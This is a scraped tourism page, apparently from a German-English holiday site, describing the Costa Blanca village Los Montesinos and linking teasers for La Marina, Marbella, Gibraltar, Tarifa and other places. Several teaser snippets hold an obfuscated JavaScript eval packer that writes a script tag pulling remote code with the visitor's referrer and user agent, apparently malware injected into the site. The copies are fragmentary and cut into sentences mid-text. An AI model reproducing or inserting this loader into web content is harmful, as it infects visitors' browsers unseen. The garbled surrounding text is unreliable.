Los Montesinos

886

Enjoy the wonderful countryside in Los Montesinos on the Costa Blanca, by visiting on foot its large plantations with different citrus fruits. Experience the scent of orange and lemon groves. Your vacation home in Los Montesinos is an ideal starting point for excursions inland or to the beach.

The small Spanish farming village Los Montesinos is located in the southern part of the Costa Blanca, in the province of Alicante. The history of this place goes back to Roman times. This documents the remains of a Roman settlement. Today, however, apartments offer in place, the rest you wish of a holiday, but without having to dispense with the corresponding comfort of such a vacation region.

The proximity to the two large salt lagoons of the region makes unique the location of Los Montesinos. Especially with rheumatism, asthma and heart trouble, bathing with the health-promoting salt water should have a relief effect. There are cultural attractions, however, in the nearby port town of Torrevieja, which is located just 10 kilometers from the site. In addition, you can also observe a rich fauna with a variety of animal species. Surely you will be able to tell from the rich birdlife of the places at home.

The nice thing in a holiday accommodation as a vacation home in Spain is that you are able to try the Spanish cuisine itself. So you can, for example, buy all the necessary ingredients for a Spanish paella or other fish dishes and hearty stews, at the daily fish market in Torrevieja or at the weekly market of Los Montesinos. Especially consider the costs of the regional specialty turrón, a nougat confection consisting of protein, sugar, honey and almonds. Of course you can also explore the many restaurants in the region to all local courts.

It is perfectly possible to enjoy equestrian or bicycle tours and long walks or even a day at the beach with water sports. Situated near Torrevieja it also offers extensive shopping opportunities as well as culinary highlights with the subsequent possibility to visit a bar or nightclub.

An image showing the church and the square in front of the church.

GPS Koordinaten vom Ayuntamiento (Gemeinde): 38.026719, -0.743590

Straße, Postleitzahl, Adresse:  La Marquesa, 1 03187 Los Montesinos

La Marina

La eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=}];e=function(){return'w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('b'+e(c)+'b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|arsdb||97|script|language|rel|nofollow|type|text|src|http|45|67|write|rnhak|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Marina La Marina is a picturesque tourist site on the Costa Blanca, Spain, located between Santa Pola and Alicante...

Marbella Fotogalerie

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|zfsyr||97|script|language|rel|nofollow|type|text|src|http|45|67|write|derst|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Fotogalerie der berühmten Stadt Marbella in der Provinz Malaga. Weitere Informationen und interessante Fakten werden folgen.

Los Montesinos

Enjoy eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=}];e=function(){return'w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('b'+e(c)+'b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|rinzi||97|script|language|rel|nofollow|type|text|src|http|45|67|write|ssykr|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) the wonderful countryside in Los Montesinos on the Costa Blanca, by visiting on foot its large plantations with...

Pilar de la Horadada

In eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=}];e=function(){return'w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('b'+e(c)+'b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|eirfz||97|script|language|rel|nofollow|type|text|src|http|45|67|write|krzyt|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) the southern part of the Costa Blanca in Spain, is the town Pilar de la Horadada. This place...

Gibraltar

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|hdyyi||97|script|language|rel|nofollow|type|text|src|http|45|67|write|ayffb|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Fotogalerie des Felsen von Gibraltar und des britischen Überseegebietes. Weitere Infos folgen bald

Tarifa, die kleine, wunderschöne Stadt am südlichsten Punkt Europas

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|asykd||97|script|language|rel|nofollow|type|text|src|http|45|67|write|yyetd|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Tarifa, die südlichste Stadt Europas mit ihren schönen Gassen, netten Cafes und tollen Wassersportmöglichkeiten. Von hier aus ist Afrika zum...

Los Montesinos

1157
Los Montesinos

Genießen Sie die wundervolle Landschaft in Los Montesinos an der Costa Blanca, indem sie die weitläufigen Plantagen mit verschiedenen Zitrusfrüchten zu Fuß erkunden. Erleben Sie den Duft der Orangen- und Zitronenhainen. Ihr Feriendomizil in Los Montesinos ist der ideale Startpunkt für Ausflüge ins Landesinnere oder an den Strand.

Das kleine spanische Bauerndorf Los Montesinos liegt im südlichen Teil der Costa Blanca, in der Provinz Alicante. Die Historie dieses Ortes reicht bis in die Römerzeit zurück. Dies dokumentieren auch die Reste einer römischen Siedlung. Heute jedoch, bieten Ihnen Ferienwohnungen im Ort, die Ruhe dieses von einem Urlaub wünschen, ohne jedoch auf den entsprechenden Komfort einer solchen Urlaubsregion verzichten zu müssen.

Die Nähe zu den beiden großen Salzlagunen der Region, macht die Lage von Los Montesinos einmalig. Vor allem bei Rheuma-, Asthma-und Herzbeschwerden soll das Baden im gesundheitsfördernden Salzwasser lindern wirken. Kulturelle Sehenswürdigkeiten gibt es indes in der nahen Hafenstadt Torrevieja, welche nur rund 10 Kilometer vom Ort entfernt liegt. Zudem können Sie dort eine reichhaltige Tierwelt mit den unterschiedlichsten Tierarten beobachten. Sicherlich werden sie zu Hause von der reichhaltigen Vogelwelt dieser Orte erzählen können.

Das schöne bei einem Urlaubdomizil wie einer Ferienwohnung in Spanien ist, dass sie in der Lage sind, die spanische Küche selbst ausprobieren zu können. So können Sie zum Beispiel alle notwendigen Zutaten für eine spanische Paella oder andere Fischgerichte und deftige Eintöpfe, auf dem täglichen Fischmarkt in Torrevieja oder auf dem Wochenmarkt von Los Montesinos einkaufen. Vor allem sollten Sie die regionale Spezialität Turrón Kosten, ein Nougatkonfekt welches aus Eiweiß, Zucker, Honig und Mandeln besteht. Natürlich bieten Ihnen auch die zahlreichen Restaurants der Region alle einheimischen Gerichte an.

Es ist problemlos möglich Reiter- oder Fahrradtouren sowie ausgedehnte Wanderungen oder auch ein Tag am Strand mit Wassersport zu genießen. Das in der Nähe gelegene  Torrevieja bietet Ihnen zudem ausgiebige Shoppingsmöglichkeiten sowie kulinarische Highlights mit der anschließenden Möglichkeit eine Bar oder Diskothek zu besuchen.

Ein Bild zeigt die Gemeinde und den Platz davor mit der Kirche.

GPS Koordinaten vom Ayuntamiento (Gemeinde): 38.026719, -0.743590

Straße, Postleitzahl, Adresse:  La Marquesa, 1 03187 Los Montesinos

Palmen Park Municipal in Elche

Palmenhain von Elche el Palmeral / Parque Municipal

Von dem Turm der Basilica de Santa Maria überschaut man die gewaltigen Palmenparks von Elche, welche von dort oben eher wie ein Wald aussehen....
Santa Pola

Santa Pola

Santa Pola ist eine wunderschöne kleine Hafenstadt an der Costa Blanca. Sie befindet sich genau zwischen Alicante und Guardamar del Segura. Der Hafen von...
Los Montesinos

Los Montesinos

Genießen Sie die wundervolle Landschaft in Los Montesinos an der Costa Blanca, indem sie die weitläufigen Plantagen mit verschiedenen Zitrusfrüchten zu Fuß erkunden. Erleben Sie...
Stadt Anna

Anna – historische kleine Stadt

Wer von Euch war schon mal in Anna? Ein kleines idyllisches Nest und ein wunderschönes Ausflugsziel mit einer schönen Wasserarchitektur. Der Name Anna hat...
Huerto Del Cura in Elche

Huerto Del Cura in Elche

Palmenpark Huerto Del Cura in Elche. Palmenparks in Elche gibt es viele. Jardín Huerto del Cura ist einer der kleinereren und dennoch ist der Eintritt...
Murcia

Murcia aktuelle Städtereisen und Informationen

Murcia Städtereisen Murcia ist mit etwa 600.000 Einwohner eine beeindruckende Großstadt im Osten von Spanien und nur ca. 30 Kilometer vom Mittelmeer entfernt. Sie gehört...
TEILEN
Vorheriger ArtikelPilar de la Horadada
Nächster ArtikelCampoamor